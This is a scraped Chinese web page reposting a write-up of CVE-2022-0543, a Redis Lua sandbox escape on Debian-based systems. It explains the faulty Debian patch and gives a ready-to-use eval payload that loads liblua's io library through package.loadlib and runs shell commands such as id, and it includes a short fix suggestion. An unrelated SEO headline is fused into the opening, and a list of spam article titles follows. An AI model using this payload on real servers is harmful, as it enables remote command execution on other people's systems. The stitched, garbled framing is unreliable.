当前位置: 首页 > news >正文

网站怎么管理维护电商常用的erp系统有哪些

网站怎么管理维护,电商常用的erp系统有哪些,自己做的创意的网站,小学手工制作100种CVE-2022-0543 | redis的远程代码执行漏洞 简介 CVE-2022-0543 该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞, 漏洞形成原因在于系统补丁加载了一些redis源码注释了的代码 原理分析 redis一直有一个攻击面,就是在用户连接redis后,可以通过ev…CVE-2022-0543 | redis的远程代码执行漏洞 简介 CVE-2022-0543 该 Redis 沙盒逃逸漏洞影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞, 漏洞形成原因在于系统补丁加载了一些redis源码注释了的代码 原理分析 redis一直有一个攻击面,就是在用户连接redis后,可以通过eval命令执行lua脚本.但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件 所以这个CVE本质是一个沙箱绕过漏洞 Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包给Redis打了一个的补丁,增加了一个include, 下面是Debian通过shell使用make生成补丁包的源码 : debian/lua_libs_debian.c:echo // Automatically generated; do not edit. $echo luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package); $set -e; for X in $(LUA_LIBS_DEBIAN_NAMES); do \echo if (luaL_dostring(lua, \$$X require($$X);\)) $; \echo serverLog(LL_NOTICE, \Error loading $$X library\); $; \doneecho luaL_dostring(lua, module nil; require nil;); $luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package)就是漏洞的来源,。 这段代码原本在redis源码里已经是被注释了的, 将其注释掉的原因就是“for sandboxing concerns” Debian的这个补丁却把这句话重新写进去了, 导致在 Lua 沙箱中遗留了一个对象package攻击者可以利用这个package对象提供的方法加载动态链接库 liblua 里的函数进而逃逸沙箱执行任意命令 借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数即可获得io库再使用其执行命令。 需要注意的一点是 : 不同系统下liblua5.1.so.0的路径可能不同 我们可以利用这个模块来加载任意Lua库最终逃逸沙箱执行任意命令 local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return resPayload: (执行命令id可以改变) eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0 一、环境启动 二、直接通过redis-cli -h 127.0.0.1 -p 6379 进入redis里面进行测试 可见执行了tac /etc/passwd命令 三、漏洞修复建议 Lua 初始化的末尾添加packagenil 。
http://www.dnsts.com.cn/news/57232.html

相关文章:

  • 001做淘宝代码的网站如何创建wordpress
  • 博客网站开发报告文库网站建设用户画像例子
  • 一键建网站在国内怎么做国外网站
  • 网站视频上传怎么做2021年简短新闻20字
  • 怎样自己免费建设一个网站无锡机关单位建设网站
  • 海沧区建设局网站市政处有没有做家纺类的网站
  • 江西省工程建设网站网站开发php和c语言区别
  • 防做网站视频深圳食品网站建设
  • 南昌市建设网站wordpress 集赞系统
  • 西安高端模板建站网站举报多久有结果
  • 做网站图片软件网站做支付需要准备什么东西吗
  • 免费建企业网站哪个好计算机前景和就业
  • 做网站推荐源创网络网站开发项目进度安排
  • 吴江建设银行网站高清素材网站无水印
  • 河南经贸一站式服务平台建设厅网站密码忘了怎么办
  • 玉儿做春梦网站西安网站建设咪豆
  • 网站怎么维护可以做外国网站文章
  • aspx做网站做网站分析
  • 建设网站可以搜索电影长春个人网站制作公司
  • php做网站半成品东莞网页制作价格
  • 软件开发 网站开发哪个难想学营销策划去哪里学
  • 茂名专业网站建设公司wordpress mysql重启
  • ICO网站模板网站业务怎么做
  • 企业网站缺点iis网站正在建设中
  • 教育 高校 网站模板网站建设于朦胧
  • 要做个卖东西网站怎么做最新网站制作
  • 宝塔怎么做两个网站的解析wordpress品牌分类
  • 网页布局设计主要有什么类型网站seo怎样做
  • 临西网站建设电话怎么建设网站电话
  • 山东平台网站建设企业怎建网站